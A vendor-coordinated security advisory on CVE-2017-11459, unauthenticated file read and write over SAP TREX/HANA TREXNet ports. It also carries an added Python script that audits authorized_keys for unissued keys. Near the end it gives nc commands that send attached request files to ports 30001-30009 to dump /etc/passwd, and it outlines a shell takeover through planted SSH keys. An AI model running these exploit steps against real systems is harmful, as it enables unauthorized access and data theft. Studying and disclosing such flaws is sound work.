Application: SAP TREX
Versions Affected: SAP TREX 7.10
Vendor URL: SAP
Bugs: RCE
Reported: 23.01.2017
Vendor response: 24.01.2017
Date of Public Advisory: 11.04.2017
Reference: SAP Security Note 2419592
Author: Mathieu Geli (ERPScan)
Class: Missing Authentication for Critical Function
Impact: disclose OS files and potentially get RCE on the server (example for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459
CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:

| Metric | Value |
|---|---|
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | High (H) |
| I: Impact to Integrity | High (H) |
| A: Impact to Availability | Low (L) |
Several sensitive operations are reachable anonymously, and they can be combined to potentially obtain remote command execution on the server.
A Remote Command Execution vulnerability allows an attacker to inject code that is executed by the application. The executed commands run with the same privileges as the service that executed them.
SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)
To correct this vulnerability, install SAP Security Note 2419592.
An attacker can forge special requests to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 to read OS files (command 'fget') or create files (command 'fdir').
If the system is Linux (by default SSH is activated), we can showcase how to get a shell on the server with those two operations by uploading a public key into the service's file ~/.ssh/authorized_keys and then connecting via SSH to the server, taking full control of the TREX daemon.
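Because the impact chain above ends with a foreign public key landing in the service account's `~/.ssh/authorized_keys`, a cheap detective control is to compare that file periodically against the keys the administrator actually issued. The following script is an added example written for this page, not code from the advisory, from ERPScan or from SAP; the account name `trexadm`, the sample file contents and the key blobs are constructed placeholders (not real key material). Fingerprints are computed the way `ssh-keygen -l` prints them (SHA256 digest of the decoded blob, unpadded base64), so the allowlist can be filled from `ssh-keygen -lf` output.

```python
"""Audit a service account's authorized_keys against an allowlist of fingerprints.

Added example for the TREX advisory (not the advisory's or SAP's code). All
sample data below is constructed.
"""
import base64
import hashlib
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, List

# Key-type token, base64 blob and optional comment. Anything before the match
# is the options field, which may itself contain quoted spaces.
_KEY_RE = re.compile(
    r"(?P<type>ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)|sk-[\w.@-]+)"
    r"\s+(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$"
)


@dataclass
class AuthorizedKey:
    line_no: int
    options: str
    key_type: str
    fingerprint: str  # "SHA256:..." in the format shown by ssh-keygen -l
    comment: str


def ssh_fingerprint(blob_b64: str) -> str:
    """SHA256 fingerprint of a base64 key blob, unpadded like ssh-keygen -l."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[AuthorizedKey]:
    """Parse authorized_keys text; malformed lines are kept and flagged, not dropped."""
    entries: List[AuthorizedKey] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _KEY_RE.search(line)
        if not m:
            entries.append(AuthorizedKey(line_no, line, "unparsable", "", ""))
            continue
        entries.append(AuthorizedKey(
            line_no=line_no,
            options=line[: m.start()].strip(),
            key_type=m.group("type"),
            fingerprint=ssh_fingerprint(m.group("blob")),
            comment=(m.group("comment") or "").strip(),
        ))
    return entries


def find_unexpected_keys(text: str, allowed_fingerprints: Iterable[str]) -> List[AuthorizedKey]:
    """Return every entry whose fingerprint is not on the allowlist (unparsable lines included)."""
    allowed = set(allowed_fingerprints)
    return [e for e in parse_authorized_keys(text) if e.fingerprint not in allowed]


def audit_file(path: str, allowed_fingerprints: Iterable[str]) -> List[AuthorizedKey]:
    """Audit a real file, e.g. /home/trexadm/.ssh/authorized_keys (hypothetical path)."""
    return find_unexpected_keys(Path(path).read_text(), allowed_fingerprints)


def _fake_blob(label: str) -> str:
    # Constructed placeholder key material, NOT a real public key.
    return base64.b64encode(f"constructed-{label}".encode()).decode()


# Constructed sample file: two issued keys plus one the administrator never added.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# keys issued to the trexadm service account (constructed sample)",
    f"ssh-ed25519 {_fake_blob('issued-1')} backup-host@example.invalid",
    f'command="/usr/local/bin/healthcheck",no-pty ssh-rsa {_fake_blob("issued-2")} monitor@example.invalid',
    "",
    f"ssh-rsa {_fake_blob('foreign')} unknown@constructed",
])

ALLOWED_FINGERPRINTS = {
    ssh_fingerprint(_fake_blob("issued-1")),
    ssh_fingerprint(_fake_blob("issued-2")),
}

if __name__ == "__main__":
    for e in find_unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print(f"line {e.line_no}: unexpected {e.key_type} {e.fingerprint} ({e.comment!r})")
```

Run against the constructed sample, the script reports only line 5, the key nobody issued; lines it cannot parse are reported too, since a write primitive that produces a malformed entry is still a write to the file worth looking at. In production the allowlist would come from the keys actually provisioned for the TREX service account, and a non-empty result would feed the alerting pipeline together with the file's modification time.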
The first attached file "trex_fget_passwd.bin" is a request to dump the OS file /etc/passwd on a Unix TREX 7.10 patched server.
You can run the exploit like this:

```shell
$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001
```
NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the /etc/passwd file, like:

```text
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[...]
```
The second file is for HANA SPS12, dumping /etc/passwd:

```shell
$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001
```
NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the /etc/passwd file, looking like:

```text
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[...]
```